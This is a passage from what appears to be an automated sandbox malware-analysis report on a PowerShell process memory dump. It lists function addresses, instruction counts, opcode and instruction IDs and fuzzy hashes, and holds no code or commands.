                                              • Instruction ID: cc7e5fc21bca5b160e98f647043a3d8807d5d7cff97a3f21f8e21fa412959fce
                                              • Opcode Fuzzy Hash: 084b49471be82472030ea5952e9f98852b6a7e88dfaa6a01861955bec2d480a6
                                              • Instruction Fuzzy Hash: 3482F97970DAC29FD7029B2D98A42D5BFA0FF9222574501F7C0C5CB4A3DE24A857C7A1
                                              Function 00007FF7C7BEBFE9 Relevance: .7, Instructions: 658COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1460831182.00007FF7C7BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7BE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c7be0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f1edbcac8a7d5ac68e0cf6f06ef332a64a910b47c365c674197b6eff4537bc6c
                                              • Instruction ID: 6bd1ae1a9a6bf2d0f060276c773363a980c7bf23aa4e3ced7ae7bff52eda742f
                                              • Opcode Fuzzy Hash: f1edbcac8a7d5ac68e0cf6f06ef332a64a910b47c365c674197b6eff4537bc6c
                                              • Instruction Fuzzy Hash: BB42B0B420EBC1AFD7068B788414795FFA1FF4621571441EBC0898A597CB34FAAAC7C5
                                              Function 00007FF7C7BF6BFB Relevance: .6, Instructions: 597COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1460831182.00007FF7C7BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7BE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c7be0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d6bb3922bcf63a42c70f8bf321ecf7fb52f2bcd5fd03fa19057fc1cc42046dc3
                                              • Instruction ID: a1eef3df898d91204275730382b3d5f668453b645e530019cea3ac5f4ae0db71
                                              • Opcode Fuzzy Hash: d6bb3922bcf63a42c70f8bf321ecf7fb52f2bcd5fd03fa19057fc1cc42046dc3
                                              • Instruction Fuzzy Hash: 4C123676A0C68A4FDB45EF2CD8906E9FBA1FF55724B8441BBC449C7182DE24E847C7A0
                                              Function 00007FF7C7BE8F70 Relevance: .5, Instructions: 502COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1460831182.00007FF7C7BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7BE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c7be0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ee6ac8c45e28bc328b256651b2e25b8885d8b4349bb4852cbfbc529883bf5c3
                                              • Instruction ID: 7d3a926762f5a5703cefd965e713c413faa7957ef16c321258b3280c44b1d01c
                                              • Opcode Fuzzy Hash: 4ee6ac8c45e28bc328b256651b2e25b8885d8b4349bb4852cbfbc529883bf5c3
                                              • Instruction Fuzzy Hash: 6112B1B020EAC1EFCB068B399425344FFA5BF4A21531591EBC0994F55BCA34B5BAC7C6
                                              Function 00007FF7C7BEB1F8 Relevance: .5, Instructions: 480COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1460831182.00007FF7C7BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7BE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c7be0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 63972e9ea123f8eb1af5f11f5ab4610eaf18bc1c56463c7f62489cf4b7c7b1c8
                                              • Instruction ID: 3f08af32be4782237032ed41071d3a9939a46e2dd2de5d403c91eb101ce63402
                                              • Opcode Fuzzy Hash: 63972e9ea123f8eb1af5f11f5ab4610eaf18bc1c56463c7f62489cf4b7c7b1c8
                                              • Instruction Fuzzy Hash: 4C02CAB820EAC19FD7068B395814319FFA1BF8621534442FFC0958B5DBCE24ED6A87D6
                                              Function 00007FF7C7BE8938 Relevance: .3, Instructions: 261COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1460831182.00007FF7C7BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7BE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c7be0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ff38190ca72c2d2523d3d2c3c6581038a2641c34380242c77081ee0a714f27bd
                                              • Instruction ID: 3e929be0326310b7b335e22da23bb29ddf5c3fcc63c7eddc41b0fe780338ac2a
                                              • Opcode Fuzzy Hash: ff38190ca72c2d2523d3d2c3c6581038a2641c34380242c77081ee0a714f27bd
                                              • Instruction Fuzzy Hash: 42A1E6A410E6C1AFD7028B391828358FFA0BF4631475951FFC0D64659BCA24FABAC3D6
                                              Function 00007FF7C7BE8D00 Relevance: .2, Instructions: 196COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1460831182.00007FF7C7BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7BE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c7be0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45e5e3560d43ed6fd27cd6f9e9194ba911ddcb745e310330ca79cd4ee88d567a
                                              • Instruction ID: 0b6c8c47b4e9526d739e9ee8b38c63f36443ca6416f51290e57ab3eb938a3f41
                                              • Opcode Fuzzy Hash: 45e5e3560d43ed6fd27cd6f9e9194ba911ddcb745e310330ca79cd4ee88d567a
                                              • Instruction Fuzzy Hash: DE71D59410F6C1AFD7068B394828258FFA1BF4721435851FFC0D64B19BC928E9AAC7D6